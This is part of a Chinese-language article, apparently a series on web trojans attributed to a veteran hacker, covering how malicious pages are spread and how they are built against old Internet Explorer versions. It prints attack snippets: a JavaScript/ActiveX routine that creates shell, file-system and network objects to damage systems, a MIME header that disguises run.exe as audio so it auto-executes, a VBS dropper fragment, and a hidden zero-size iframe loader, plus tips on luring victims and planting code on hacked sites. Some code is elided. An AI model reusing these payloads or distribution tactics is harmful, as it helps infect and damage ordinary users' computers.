国内资深黑客详谈网页木马（3）

四、网页木马的基本用法

　　理解了网页木马攻击的原理，以及常用的漏洞，就可以写出相关的利用代码。制作出网页木马，然后就是传播网页木马，目前网页木马的主要传播途径是：

　　1.通过IM及时聊天软件传播

　　将包含网页木马的地址(网址)通过QQ等聊天软件在网络中分发，一旦有用户访问了该网页，该网页就会在系统中自动下载并运行放置在网络上的木马。

　　2.攻击知名网站，获得Webshell权限后，在网站中填加恶意代码，如：

　　(1)iframe

　　注：';

　　利用在知名门户网站，填加恶意脚本的攻击行为很多，例如，安天实验室在06年8月份就发现了针对KFC肯德基，雪花啤酒，迈拓硬盘等知名网站的攻击行为。所采用的都是此种方式。

　　3.利用美丽的网页名称及内容，诱惑用户访问。

　　很多恶意网页或是站点的制作者，对浏览者的心理进行了分析，对域名的选择和利用非常精明。很多网民对一些黄色信息比较感兴趣，成为了他们利用的渠道。他们会构建名www.love.com，或是http://bangbus.year.net等具有诱惑性的名称诱惑用户点击。

　　4.利用电子邮件等传播。

　　攻击者，利用电子邮件群发工具，发送包含诱惑性信息的主题邮件，诱惑用户点击其中包含的网页。

　　五、目前常用的网页木马制作方式

　　1.Javascript.Exception.Exploit

　　利用JS+WSH的完美结合，来制作恶意网页。

　　2.错误的MIME Multipurpose Internet Mail Extentions，多用途的网际邮件扩充协议头.几乎是现在网页木马流行利用的基本趋势，这个漏洞在IE5.0到IE6.0版本中都有。

　　3.EXE to .BMP + Javascritp.Exception.Exploit用虚假的BMP文件诱惑用户运行。

　　4.iframe 漏洞的利用

　　当微软的IE窗口打开另一个窗口时，如果子窗口是另一个域或安全区的话，安全检查应当阻止父窗口访问子窗口。但事实并非如此，父窗口可以访问子窗口文档的frame，这可能导致父窗口无论是域或安全区都能在子窗口中设置Frame或IFrame的URL。这会带来严重的安全问题，通过设置URL指向javascript协议，父窗口能在子域环境下运行脚本代码，包括任意的恶意代码。攻击者也能在“我的电脑”区域中运行脚本代码。这更会造成严重的后果。

　　5.通过安全认证的CAB,COX

　　此类方法就是在.CAB文件上做手脚，使证书.SPC和密钥.PVK合法

　　原理：IE读文件时会有文件读不出，就会去“升级”这样它会在网页中指定的位找 .cab 并在系统里写入个CID读入.cab里的文件。

　　方法：.cab是WINDOWS里的压缩文件， IE里所用的安全文件是用签名的，CAB也不例外，所做的CAB是经过安全使用证书引入的。也就是说IE认证攻击，之所以每次都能入侵，是因为它通过的是IE认证下的安全攻击。

　　6.EXE文件的捆绑

　　现在的网页木马捆绑机几乎是开始泛滥了，多的数不胜数。再将生成的MHT文件进行加密。

六、常用网页木马运行原理的分析

　　1.Javascript.Exception.Exploit

　　常用的攻击代码：

　　

Function destroy(){ 　　try 　　{ 　　//ActiveX initialization 初始化ActiveX，为修改注册表做准备 　　a1=document.applets[0]; 　　//获取applet运行对象，以下语句指向注册表中有关IE的表项 　　a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 　　a1.createInstance(); 　　Shl = a1.GetObject(); 　　a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 　　a1.createInstance(); 　　FSO = a1.GetObject(); 　　a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 　　a1.createInstance(); 　　Net = a1.GetObject(); 　　try 　　{ 　　开始进行破坏 　　} 　　} 　　catch(e) 　　{} 　　} 　　catch(e) 　　{} 　　} 　　function do() 　　{ 　　//初始化函数，并每隔一秒执行修改程序 　　setTimeout("destroy()", 1000); //设定运行时间1秒 　　} 　　Do() //进行破坏的执行函数指令

　　这个代码是JAVAScript编写，很简单，但却可以修改受影响系统的注册表，释放垃圾文件，格式化硬盘等。

2.错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头

　　常用的攻击代码：

　　

Content-Type: multipart/related; 　　type="multipart/alternative"; 　　boundary="====B====" 　　--====B==== 　　Content-Type: multipart/alternative; 　　boundary="====A====" 　　--====A==== 　　Content-Type: text/html; 　　Content-Transfer-Encoding: quoted-printable 　　--====A====-- 　　--====B==== 　　Content-Type: audio/x-wav; 　　name="run.exe" 　　Content-Transfer-Encoding: base64 　　Content-ID: ---以下省略AAAAA N+1个---

　　把run.exe的类型定义为audio/x-wav，这是利用客户端支持的 MIME(多部分网际邮件扩展，Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件的类型audio/x-wav时，IE存在的一个漏洞会将附件认为是音频文件自动尝试打开，，结果导致邮件文件x.eml中的附件run.exe被执行。在win2000上，即使是用鼠标点击下载下来的 x.eml，或是拷贝粘贴，都会导致x.eml中的附件被运行。整个程序的运行还是依靠x.eml这个文件来支持。Content-Transfer-Encoding: base64 Content-ID: 从中可以看出，由于定义后字符格式为base64，那么一下的代码全部为加密过的代码，里面可以是任何执行的命令：

　　

〈script language=vbs〉 　　On Error Resume Next•　容错语句，避免程序崩溃 　　set aa=CreateObject("WScript.Shell")•建立WScript对象 　　Set fs = CreateObject("Scripting.FileSystemObject")•建立文件系统对象 　　Set dir1 = fs.GetSpecialFolder(0)•得到Windows路径 　　Set dir2 = fs.GetSpecialFolder(1)•得到System路径 　　……省略……

　　之所以有的病毒不能准确的清除全部的病毒体，是因为很多杀毒软件，病毒监控只杀当时查到的，却不能处理新建的文件。

　　3.Iframe 漏洞的利用

　　常用攻击代码：

　　

〈iframe src=run.eml width=0 height=0〉〈/iframe〉

　　常见的木马运用格式，高度和宽度为0的一个框架网页。

　　一个框架引用的新方式，对type="text/x-scriptlet" 的调整后，就可以实现和eml格式文件同样的效果。

　　4.Microsoft Internet Explorer浏览器弹出窗口Object类型验证漏洞的利用

　　常见攻击代码：

　

----- code cut start for run.asp ----- 　　----- code cut end for run.asp -----